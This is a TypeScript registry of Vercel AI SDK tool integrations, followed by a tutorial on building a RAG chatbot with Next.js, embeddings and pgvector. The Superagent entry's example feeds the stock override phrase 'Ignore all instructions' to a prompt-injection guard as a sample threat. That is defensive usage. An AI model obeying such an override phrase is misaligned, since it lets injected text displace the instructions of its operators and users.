// CONTRIBUTING GUIDE // https://github.com/vercel/ai/blob/main/contributing/add-new-tool-to-registry.md
export interface Tool { slug: string; name: string; description: string; packageName: string; tags?: string[]; apiKeyEnvName?: string; installCommand: { pnpm: string; npm: string; yarn: string; bun: string; }; codeExample: string; docsUrl?: string; apiKeyUrl?: string; websiteUrl?: string; npmUrl?: string; }
export const tools: Tool[] = [ { slug: 'code-execution', name: 'Code Execution', description: 'Execute Python code in a sandboxed environment using Vercel Sandbox. Run calculations, data processing, and other computational tasks safely in an isolated environment with Python 3.13.', packageName: 'ai-sdk-tool-code-execution', tags: ['code-execution', 'sandbox'], apiKeyEnvName: 'VERCEL_OIDC_TOKEN', installCommand: { pnpm: 'pnpm add ai-sdk-tool-code-execution', npm: 'npm install ai-sdk-tool-code-execution', yarn: 'yarn add ai-sdk-tool-code-execution', bun: 'bun add ai-sdk-tool-code-execution', }, codeExample: `import { generateText, stepCountIs } from 'ai'; import { executeCode } from 'ai-sdk-tool-code-execution';
const { text } = await generateText({ model: 'openai/gpt-5.1-codex', prompt: 'What is 5 + 5 minus 84 cubed?', tools: { executeCode: executeCode(), }, stopWhen: stepCountIs(5), });
console.log(text);`, docsUrl: 'https://vercel.com/docs/vercel-sandbox', apiKeyUrl: 'https://vercel.com/docs/vercel-sandbox#authentication', websiteUrl: 'https://vercel.com/docs/vercel-sandbox', npmUrl: 'https://www.npmjs.com/package/ai-sdk-tool-code-execution', }, { slug: 'exa', name: 'Exa', description: 'Exa is a web search API that adds web search capabilities to your LLMs. Exa can search the web for code docs, current information, news, articles, and a lot more. Exa performs real-time web searches and can get page content from specific URLs. Add Exa web search tool to your LLMs in just a few lines of code.', packageName: '@exalabs/ai-sdk', tags: ['search', 'web', 'extraction'], apiKeyEnvName: 'EXA_API_KEY', installCommand: { pnpm: 'pnpm add @exalabs/ai-sdk', npm: 'npm install @exalabs/ai-sdk', yarn: 'yarn add @exalabs/ai-sdk', bun: 'bun add @exalabs/ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { webSearch } from '@exalabs/ai-sdk';
const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'Tell me the latest developments in AI', tools: { webSearch: webSearch(), }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.exa.ai/reference/vercel', apiKeyUrl: 'https://dashboard.exa.ai/api-keys', websiteUrl: 'https://exa.ai', npmUrl: 'https://www.npmjs.com/package/@exalabs/ai-sdk', }, { slug: 'parallel', name: 'Parallel', description: 'Parallel gives AI agents best-in-class tools to search and extract context from the web. Web results returned by Parallel are compressed for optimal token efficiency at inference time.', packageName: '@parallel-web/ai-sdk-tools', tags: ['search', 'web', 'extraction'], apiKeyEnvName: 'PARALLEL_API_KEY', installCommand: { pnpm: 'pnpm add @parallel-web/ai-sdk-tools', npm: 'npm install @parallel-web/ai-sdk-tools', yarn: 'yarn add @parallel-web/ai-sdk-tools', bun: 'bun add @parallel-web/ai-sdk-tools', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { searchTool, extractTool } from '@parallel-web/ai-sdk-tools';
const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'When was Vercel Ship AI?', tools: { webSearch: searchTool, webExtract: extractTool, }, stopWhen: stepCountIs(3), });
console.log(text);`, apiKeyUrl: 'https://platform.parallel.ai', websiteUrl: 'https://parallel.ai', npmUrl: 'https://www.npmjs.com/package/@parallel-web/ai-sdk-tools', }, { slug: 'ctx-zip', name: 'ctx-zip', description: 'Transform MCP tools and AI SDK tools into code, write it to a Vercel sandbox file system and have the agent import the tools, write code, and execute it.', packageName: 'ctx-zip', tags: ['code-execution', 'sandbox', 'mcp', 'code-mode'], apiKeyEnvName: 'VERCEL_OIDC_TOKEN', installCommand: { pnpm: 'pnpm add ctx-zip', npm: 'npm install ctx-zip', yarn: 'yarn add ctx-zip', bun: 'bun add ctx-zip', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { createVercelSandboxCodeMode, SANDBOX_SYSTEM_PROMPT } from 'ctx-zip';
const { tools } = await createVercelSandboxCodeMode({ servers: [ { name: 'vercel', url: 'https://mcp.vercel.com', useSSE: false, headers: { Authorization: \`Bearer \${process.env.VERCEL_API_KEY}\`, }, }, ], standardTools: { weather: weatherTool, }, });
const { text } = await generateText({ model: 'openai/gpt-5.2', tools, stopWhen: stepCountIs(20), system: SANDBOX_SYSTEM_PROMPT, messages: [ { role: 'user', content: 'What tools are available from the Vercel MCP server?', }, ], });
console.log(text);
`, docsUrl: 'https://github.com/karthikscale3/ctx-zip/blob/main/README.md', apiKeyUrl: 'https://vercel.com/docs/vercel-sandbox#authentication', websiteUrl: 'https://github.com/karthikscale3/ctx-zip/blob/main/README.md', npmUrl: 'https://www.npmjs.com/package/ctx-zip', }, { slug: 'perplexity-search', name: 'Perplexity Search', description: "Search the web with real-time results and advanced filtering powered by Perplexity's Search API. Provides ranked search results with domain, language, date range, and recency filters. Supports multi-query searches and regional search results.", packageName: '@perplexity-ai/ai-sdk', tags: ['search', 'web'], apiKeyEnvName: 'PERPLEXITY_API_KEY', installCommand: { pnpm: 'pnpm add @perplexity-ai/ai-sdk', npm: 'npm install @perplexity-ai/ai-sdk', yarn: 'yarn add @perplexity-ai/ai-sdk', bun: 'bun add @perplexity-ai/ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { perplexitySearch } from '@perplexity-ai/ai-sdk';
const { text } = await generateText({ model: 'openai/gpt-5.2', prompt: 'What are the latest AI developments? Use search to find current information.', tools: { search: perplexitySearch(), }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.perplexity.ai/guides/search-quickstart', apiKeyUrl: 'https://www.perplexity.ai/account/api/keys', websiteUrl: 'https://www.perplexity.ai', npmUrl: 'https://www.npmjs.com/package/@perplexity-ai/ai-sdk', }, { slug: 'tavily', name: 'Tavily', description: 'Tavily is a web intelligence platform offering real-time web search optimized for AI applications. Tavily provides comprehensive web research capabilities including search, content extraction, website crawling, and site mapping to power AI agents with current information.', packageName: '@tavily/ai-sdk', tags: ['search', 'extract', 'crawl'], apiKeyEnvName: 'TAVILY_API_KEY', installCommand: { pnpm: 'pnpm add @tavily/ai-sdk', npm: 'npm install @tavily/ai-sdk', yarn: 'yarn add @tavily/ai-sdk', bun: 'bun add @tavily/ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { tavilySearch } from '@tavily/ai-sdk';
const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'What are the latest developments in agentic search?', tools: { webSearch: tavilySearch, }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.tavily.com/documentation/integrations/vercel', apiKeyUrl: 'https://app.tavily.com/home', websiteUrl: 'https://tavily.com', npmUrl: 'https://www.npmjs.com/package/@tavily/ai-sdk', }, { slug: 'firecrawl', name: 'Firecrawl', description: 'Firecrawl tools for the AI SDK. Web scraping, search, crawling, and data extraction for AI applications. Scrape any website into clean markdown, search the web, crawl entire sites, and extract structured data.', packageName: 'firecrawl-aisdk', tags: ['scraping', 'search', 'crawling', 'extraction', 'web'], apiKeyEnvName: 'FIRECRAWL_API_KEY', installCommand: { pnpm: 'pnpm add firecrawl-aisdk', npm: 'npm install firecrawl-aisdk', yarn: 'yarn add firecrawl-aisdk', bun: 'bun add firecrawl-aisdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { scrapeTool } from 'firecrawl-aisdk';
const { text } = await generateText({ model: 'openai/gpt-5-mini', prompt: 'Scrape https://firecrawl.dev and summarize what it does', tools: { scrape: scrapeTool, }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.firecrawl.dev/integrations/ai-sdk', apiKeyUrl: 'https://firecrawl.dev/app/api-keys', websiteUrl: 'https://firecrawl.dev', npmUrl: 'https://www.npmjs.com/package/firecrawl-aisdk', }, { slug: 'bedrock-agentcore', name: 'Amazon Bedrock AgentCore', description: 'Fully managed Browser and Code Interpreter tools for AI agents. Browser is a fast and secure cloud-based runtime for interacting with web applications, filling forms, navigating websites, and extracting information. Code Interpreter provides an isolated sandbox for executing Python, JavaScript, and TypeScript code to solve complex tasks.', packageName: 'bedrock-agentcore', tags: ['code-execution', 'browser-automation', 'sandbox'], apiKeyEnvName: 'AWS_ROLE_ARN', installCommand: { pnpm: 'pnpm add bedrock-agentcore', npm: 'npm install bedrock-agentcore', yarn: 'yarn add bedrock-agentcore', bun: 'bun add bedrock-agentcore', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { awsCredentialsProvider } from '@vercel/oidc-aws-credentials-provider';
import { CodeInterpreterTools } from 'bedrock-agentcore/code-interpreter/vercel-ai';
import { BrowserTools } from 'bedrock-agentcore/browser/vercel-ai';
const credentialsProvider = awsCredentialsProvider({ roleArn: process.env.AWS_ROLE_ARN!, });
const codeInterpreter = new CodeInterpreterTools({ credentialsProvider }); const browser = new BrowserTools({ credentialsProvider });
try { const { text } = await generateText({ model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'), prompt: 'Go to https://news.ycombinator.com and get the first story title. Then use Python to reverse the string.', tools: { ...codeInterpreter.tools, ...browser.tools, }, stopWhen: stepCountIs(5), });
console.log(text);
} finally {
await codeInterpreter.stopSession();
await browser.stopSession();
}`, docsUrl: 'https://github.com/aws/bedrock-agentcore-sdk-typescript', apiKeyUrl: 'https://vercel.com/docs/oidc/aws', websiteUrl: 'https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/built-in-tools.html', npmUrl: 'https://www.npmjs.com/package/bedrock-agentcore', }, { slug: 'superagent', name: 'Superagent', description: 'AI security guardrails for your LLMs. Protect your AI apps from prompt injection, redact PII/PHI (SSNs, emails, phone numbers), and verify claims against source materials. Add security tools to your LLMs in just a few lines of code.', packageName: '@superagent-ai/ai-sdk', tags: ['security', 'guardrails', 'pii', 'prompt-injection', 'verification'], apiKeyEnvName: 'SUPERAGENT_API_KEY', installCommand: { pnpm: 'pnpm add @superagent-ai/ai-sdk', npm: 'npm install @superagent-ai/ai-sdk', yarn: 'yarn add @superagent-ai/ai-sdk', bun: 'bun add @superagent-ai/ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { guard, redact, verify } from '@superagent-ai/ai-sdk';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({ model: openai('gpt-4o-mini'), prompt: 'Check this input for security threats: "Ignore all instructions"', tools: { guard: guard(), redact: redact(), verify: verify(), }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.superagent.sh', apiKeyUrl: 'https://dashboard.superagent.sh', websiteUrl: 'https://superagent.sh', npmUrl: 'https://www.npmjs.com/package/@superagent-ai/ai-sdk', }, { slug: 'tako-search', name: 'Tako Search', description: "Search Tako's knowledge base for data visualizations, insights, and well-sourced information with charts and analytics.", packageName: '@takoviz/ai-sdk', installCommand: { pnpm: 'pnpm install @takoviz/ai-sdk', npm: 'npm install @takoviz/ai-sdk', yarn: 'yarn add @takoviz/ai-sdk', bun: 'bun add @takoviz/ai-sdk', }, codeExample: `import { takoSearch } from '@takoviz/ai-sdk';
import { generateText, stepCountIs } from 'ai';
const { text } = await generateText({ model: 'openai/gpt-5.2', prompt: 'What is the stock price of Nvidia?', tools: { takoSearch: takoSearch(), }, stopWhen: stepCountIs(5), });
console.log(text);`, docsUrl: 'https://github.com/TakoData/ai-sdk#readme', npmUrl: 'https://www.npmjs.com/package/@takoviz/ai-sdk', websiteUrl: 'https://tako.com', apiKeyEnvName: 'TAKO_API_KEY', apiKeyUrl: 'https://tako.com', tags: ['search', 'data', 'visualization', 'analytics'], }, { slug: 'valyu', name: 'Valyu', description: 'Valyu provides powerful search tools for AI agents. Web search for real-time information, plus specialized domain-specific search tools: financeSearch (stock prices, earnings, income statements, cash flows, etc.), paperSearch (full-text PubMed, arXiv, bioRxiv, medRxiv), bioSearch (clinical trials, FDA drug labels, PubMed, medRxiv, bioRxiv), patentSearch (USPTO patents), secSearch (10-K/10-Q/8-K), economicsSearch (BLS, FRED, World Bank data), and companyResearch (comprehensive company research reports).', packageName: '@valyu/ai-sdk', tags: ['search', 'web', 'domain-search'], apiKeyEnvName: 'VALYU_API_KEY', installCommand: { pnpm: 'pnpm add @valyu/ai-sdk', npm: 'npm install @valyu/ai-sdk', yarn: 'yarn add @valyu/ai-sdk', bun: 'bun add @valyu/ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { webSearch } from '@valyu/ai-sdk';
// Available specialised search tools: financeSearch, paperSearch,
// bioSearch, patentSearch, secSearch, economicsSearch, companyResearch
const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'Latest data center projects for AI inference?', tools: { webSearch: webSearch(), }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.valyu.ai/integrations/vercel-ai-sdk', apiKeyUrl: 'https://platform.valyu.ai', websiteUrl: 'https://valyu.ai', npmUrl: 'https://www.npmjs.com/package/@valyu/ai-sdk', }, { slug: 'airweave', name: 'Airweave', description: 'Airweave is an open-source platform that makes any app searchable for your agent. Sync and search across 35+ data sources (Notion, Slack, Google Drive, databases, and more) with semantic search. Add unified search across all your connected data to your AI applications in just a few lines of code.', packageName: '@airweave/vercel-ai-sdk', tags: ['search', 'rag', 'data-sources', 'semantic-search'], apiKeyEnvName: 'AIRWEAVE_API_KEY', installCommand: { pnpm: 'pnpm install @airweave/vercel-ai-sdk', npm: 'npm install @airweave/vercel-ai-sdk', yarn: 'yarn add @airweave/vercel-ai-sdk', bun: 'bun add @airweave/vercel-ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { airweaveSearch } from '@airweave/vercel-ai-sdk';
const { text } = await generateText({ model: 'anthropic/claude-sonnet-4.5', prompt: 'What were the key decisions from last week?', tools: { search: airweaveSearch({ defaultCollection: 'my-knowledge-base', }), }, stopWhen: stepCountIs(3), });
console.log(text);`, docsUrl: 'https://docs.airweave.ai', apiKeyUrl: 'https://app.airweave.ai/settings/api-keys', websiteUrl: 'https://airweave.ai', npmUrl: 'https://www.npmjs.com/package/@airweave/vercel-ai-sdk', }, { slug: 'bash-tool', name: 'bash-tool', description: 'Provides bash, readFile, and writeFile tools for AI agents. Supports @vercel/sandbox for full VM isolation.', packageName: 'bash-tool', tags: ['bash', 'file-system', 'sandbox', 'code-execution'], installCommand: { pnpm: 'pnpm install bash-tool', npm: 'npm install bash-tool', yarn: 'yarn add bash-tool', bun: 'bun add bash-tool', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { createBashTool } from 'bash-tool';
const { tools } = await createBashTool({ files: { 'src/index.ts': "export const hello = 'world';" }, });
const { text } = await generateText({ model: 'anthropic/claude-sonnet-4', prompt: 'List the files in src/ and show me the contents of index.ts', tools, stopWhen: stepCountIs(5), });
console.log(text);`, docsUrl: 'https://github.com/vercel/bash-tool', websiteUrl: 'https://github.com/vercel/bash-tool', npmUrl: 'https://www.npmjs.com/package/bash-tool', }, { slug: 'browserbase', name: 'Browserbase', description: 'Browserbase provides browser automation tools for AI agents powered by Stagehand. Navigate websites, take screenshots, click buttons, fill forms, extract structured data, and execute multi-step browser tasks in cloud-hosted sessions with built-in CAPTCHA solving and anti-bot stealth mode.', packageName: '@browserbasehq/ai-sdk', tags: ['browser', 'browser-automation', 'web', 'extraction'], apiKeyEnvName: 'BROWSERBASE_API_KEY', installCommand: { pnpm: 'pnpm add @browserbasehq/ai-sdk', npm: 'npm install @browserbasehq/ai-sdk', yarn: 'yarn add @browserbasehq/ai-sdk', bun: 'bun add @browserbasehq/ai-sdk', }, codeExample: `import { generateText, stepCountIs } from 'ai';
import { createBrowserbaseTools } from '@browserbasehq/ai-sdk';
const browserbase = createBrowserbaseTools();
const { text } = await generateText({ model: 'google/gemini-3-pro-preview', tools: browserbase.tools, stopWhen: stepCountIs(10), prompt: 'Open https://news.ycombinator.com and summarize the top 3 stories.', });
console.log(text); await browserbase.closeSession();`, docsUrl: 'https://docs.browserbase.com', apiKeyUrl: 'https://www.browserbase.com/settings', websiteUrl: 'https://www.browserbase.com', npmUrl: 'https://www.npmjs.com/package/@browserbasehq/ai-sdk', }, ];
title: RAG Agent
description: Learn how to build a RAG Agent with the AI SDK and Next.js
RAG Chatbot Guide
In this guide, you will learn how to build a retrieval-augmented generation (RAG) Agent.
Before we dive in, let's look at what RAG is, and why we would want to use it.
What is RAG?
RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.
Why is RAG important?
While LLMs are powerful, the information they can reason about is restricted to the data they were trained on. This problem becomes apparent when asking an LLM for information outside of its training data, like proprietary data or events that occurred after the model's training cutoff. RAG solves this problem by fetching information relevant to the prompt and then passing that to the model as context.
To illustrate with a basic example, imagine asking the model for your favorite food:
**input**
What is my favorite food?
**generation**
I don't have access to personal information about individuals, including their
favorite foods.
Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:
**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets
**generation**
Your favorite food is chicken nuggets!
Just like that, you have augmented the model's generation by providing relevant information to the query. Assuming the model has the appropriate information, it is now highly likely to return an accurate response to the user's query. But how does it retrieve the relevant information? The answer lies in a concept called embedding.
Embedding
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
In practice, this means that if you embedded the words cat and dog, you would expect them to be plotted close to each other in vector space. The process of calculating the similarity between two vectors is called 'cosine similarity', where a value of 1 indicates high similarity and a value of -1 indicates high opposition.
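To make this concrete, here is a minimal sketch of the computation in TypeScript. It is illustrative only; you will not hand-roll this in the guide, since the retrieval step later relies on Drizzle's cosineDistance helper in SQL.

```ts
// Minimal sketch of cosine similarity between two equal-length vectors.
// Illustrative only; the guide's retrieval step computes this in SQL instead.
function cosineSimilarity(a: number[], b: number[]): number {
  let dot = 0;
  let normA = 0;
  let normB = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i]; // dot product
    normA += a[i] * a[i]; // squared magnitude of a
    normB += b[i] * b[i]; // squared magnitude of b
  }
  return dot / (Math.sqrt(normA) * Math.sqrt(normB));
}

console.log(cosineSimilarity([1, 2, 3], [2, 4, 6])); // 1 (same direction)
console.log(cosineSimilarity([1, 0], [-1, 0])); // -1 (opposite direction)
```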
As mentioned above, embeddings are a way to represent the semantic meaning of words and phrases. The implication here is that the larger the input to your embedding, the lower quality the embedding will be. So how would you approach embedding content longer than a simple phrase?
Chunking
Chunking refers to the process of breaking down a particular source material into smaller pieces. There are many different approaches to chunking and it’s worth experimenting as the most effective approach can differ by use case. A simple and common approach to chunking (and what you will be using in this guide) is separating written content by sentences.
Once your source material is appropriately chunked, you can embed each one and then store the embedding and the chunk together in a database. Embeddings can be stored in any database that supports vectors. For this tutorial, you will be using Postgres alongside the pgvector plugin.
All Together Now
Combining all of this together, RAG is the process of enabling the model to respond with information outside of its training data by embedding a user's query, retrieving the relevant source material (chunks) with the highest semantic similarity, and then passing them alongside the initial query as context. Going back to the example where you ask the model for your favorite food, the prompt preparation process would look like this.
By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.
Onto the project!
Project Setup
In this project, you will build a chatbot that will only respond with information that it has within its knowledge base. The chatbot will be able to both store and retrieve information. This project has many interesting use cases from customer support through to building your own second brain!
This project will use the following stack:
- Next.js 14 (App Router)
- AI SDK
- OpenAI
- Drizzle ORM
- Postgres with pgvector
- shadcn-ui and TailwindCSS for styling
Clone Repo
To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:
- Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
- a basic schema for the resources table (this will be for source material)
- a Server Action for creating a resource
To get started, clone the starter repository with the following command:
<Snippet text={[ 'git clone https://github.com/vercel/ai-sdk-rag-starter', 'cd ai-sdk-rag-starter', ]} />
First things first, run the following command to install the project’s dependencies:
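<Snippet text={['pnpm install']} />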
Create Database
You will need a Postgres database to complete this tutorial. If you don't have Postgres set up on your local machine, you can:
- Create a free Postgres database with Vercel Postgres; or
- Follow this guide to set it up locally
Migrate Database
Once you have a Postgres database, you need to add the connection string as an environment secret.
Make a copy of the .env.example file and rename it to .env.
Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.
With that set up, you can now run your first database migration. Run the following command:
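<Snippet text={['pnpm db:migrate']} />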
This will first add the pgvector extension to your database. Then it will create a new table for your resources schema that is defined in lib/db/schema/resources.ts. This schema has four columns: id, content, createdAt, and updatedAt.
OpenAI API Key
For this guide, you will need an OpenAI API key. To generate an API key, go to platform.openai.com.
Once you have your API key, paste it into your .env file (OPENAI_API_KEY).
Build
Let’s build a quick task list of what needs to be done:
- Create a table in your database to store embeddings
- Add logic to chunk and create embeddings when creating resources
- Create a chatbot
- Give the chatbot tools to query / create resources for its knowledge base
Create Embeddings Table
Currently, your application has one table (resources) which has a column (content) for storing content. Remember, each resource (source material) will have to be chunked, embedded, and then stored. Let’s create a table called embeddings to store these chunks.
Create a new file (lib/db/schema/embeddings.ts) and add the following code:
import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';
export const embeddings = pgTable(
'embeddings',
{
id: varchar('id', { length: 191 })
.primaryKey()
.$defaultFn(() => nanoid()),
resourceId: varchar('resource_id', { length: 191 }).references(
() => resources.id,
{ onDelete: 'cascade' },
),
content: text('content').notNull(),
embedding: vector('embedding', { dimensions: 1536 }).notNull(),
},
table => ({
embeddingIndex: index('embeddingIndex').using(
'hnsw',
table.embedding.op('vector_cosine_ops'),
),
}),
);
This table has four columns:
- id - unique identifier
- resourceId - a foreign key relation to the full source material
- content - the plain text chunk
- embedding - the vector representation of the plain text chunk
To perform similarity search, you also need to include an index (HNSW or IVFFlat) on this column for better performance.
To push this change to the database, run the following command:
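<Snippet text={['pnpm db:push']} />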
Add Embedding Logic
Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.
Create a file with the following command:
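<Snippet text={['mkdir lib/ai && touch lib/ai/embedding.ts']} />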
Generate Chunks
Remember, to create an embedding, you will start with a piece of source material (unknown length), break it down into smaller chunks, embed each chunk, and then save the chunk to the database. Let’s start by creating a function to break the source material into small chunks.
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
This function will take an input string and split it by periods, filtering out any empty items. This will return an array of strings. It is worth experimenting with different chunking techniques in your projects as the best technique will vary.
Install AI SDK
You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:
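<Snippet text={['pnpm add ai @ai-sdk/react @ai-sdk/openai']} />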
This will install the AI SDK, AI SDK's React hooks, and AI SDK's OpenAI provider.
Generate Embeddings
Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.
import { embedMany } from 'ai';
import { openai } from '@ai-sdk/openai';
const embeddingModel = openai.embedding('text-embedding-ada-002');
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.
Next, you create an asynchronous function called generateEmbeddings. This function will take in the source material (value) as an input and return a promise of an array of objects, each containing an embedding and content. Within the function, you first generate chunks for the input. Then, you pass those chunks to the embedMany function imported from the AI SDK which will return embeddings of the chunks you passed in. Finally, you map over and return the embeddings in a format that is ready to save in the database.
Update Server Action
Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
return 'Resource successfully created.';
} catch (e) {
if (e instanceof Error)
return e.message.length > 0 ? e.message : 'Error, please try again.';
}
};
This function is a Server Action, as denoted by the 'use server'; directive at the top of the file. This means that it can be called anywhere in your Next.js application. This function will take an input, run it through a Zod schema to ensure it adheres to the correct shape, and then create a new resource in the database. This is the ideal location to generate and store embeddings of the newly created resource.
Update the file with the following code:
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
const embeddings = await generateEmbeddings(content);
await db.insert(embeddingsTable).values(
embeddings.map(embedding => ({
resourceId: resource.id,
...embedding,
})),
);
return 'Resource successfully created and embedded.';
} catch (error) {
return error instanceof Error && error.message.length > 0
? error.message
: 'Error, please try again.';
}
};
First, you call the generateEmbeddings function created in the previous step, passing in the source material (content). Once you have the embeddings of the source material, you can save them to the database, passing the resourceId alongside each embedding.
Create Root Page
Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your chatbot application.
Replace your root page (app/page.tsx) with the following code.
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
<p>{m.content}</p>
</div>
</div>
))}
</div>
<form onSubmit={handleSubmit}>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={handleInputChange}
/>
</form>
</div>
);
}
The useChat hook enables the streaming of chat messages from your AI provider (you will be using OpenAI), manages the state for chat input, and updates the UI automatically as new messages are received.
Run the following command to start the Next.js dev server:
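<Snippet text={['pnpm run dev']} />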
Head to http://localhost:3000. You should see an empty screen with an input bar floating at the bottom. Try to send a message. The message shows up in the UI for a fraction of a second and then disappears. This is because you haven’t set up the corresponding API route to call the model! By default, useChat will send a POST request to the /api/chat endpoint with the messages as the request body.
You can customize the endpoint in the useChat configuration object.
Create API Route
In Next.js, you can create custom request handlers for a given route using Route Handlers. Route Handlers are defined in a route.ts file and can export HTTP methods like GET, POST, PUT, PATCH etc.
Create a file at app/api/chat/route.ts by running the following command:
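<Snippet text={['mkdir -p app/api/chat && touch app/api/chat/route.ts']} />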
Open the file and add the following code:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
});
return result.toDataStreamResponse();
}
In this code, you declare and export an asynchronous function called POST. You retrieve the messages from the request body and then pass them to the streamText function imported from the AI SDK, alongside the model you would like to use. Finally, you return the model's response as a data stream response.
Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!
Refining your prompt
While you now have a working chatbot, it isn't doing anything special.
Let’s add system instructions to refine and restrict the model’s behavior. In this case, you want the model to only use information it has retrieved to generate responses. Update your route handler with the following code:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages,
});
return result.toDataStreamResponse();
}
Head back to the browser and try to ask the model what your favorite food is. The model should now respond exactly as you instructed above (“Sorry, I don’t know”) given it doesn’t have any relevant information.
In its current form, your chatbot is now, well, useless. How do you give the model the ability to add and query information?
Using Tools
A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.
Let's see how you can create a tool to give the model the ability to create, embed, and save a resource to your chatbot's knowledge base.
Add Resource Tool
Update your route handler with the following code:
import { createResource } from '@/lib/actions/resources';
import { openai } from '@ai-sdk/openai';
import { streamText, tool } from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages,
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
parameters: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toDataStreamResponse();
}
In this code, you define a tool called addResource. This tool has three elements:
- description: description of the tool that will influence when the tool is picked.
- parameters: Zod schema that defines the parameters necessary for the tool to run.
- execute: An asynchronous function that is called with the arguments from the tool call.
In simple terms, on each generation, the model will decide whether it should call the tool. If it deems it should call the tool, it will extract the parameters from the input and then append a new message to the messages array of type tool-call. The AI SDK will then run the execute function with the parameters provided by the tool-call message.
Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.
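<Snippet text={['pnpm db:studio']} />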
This will start Drizzle Studio, where you can view the rows in your database. You should see a new row in both the embeddings and resources tables with your favorite food!
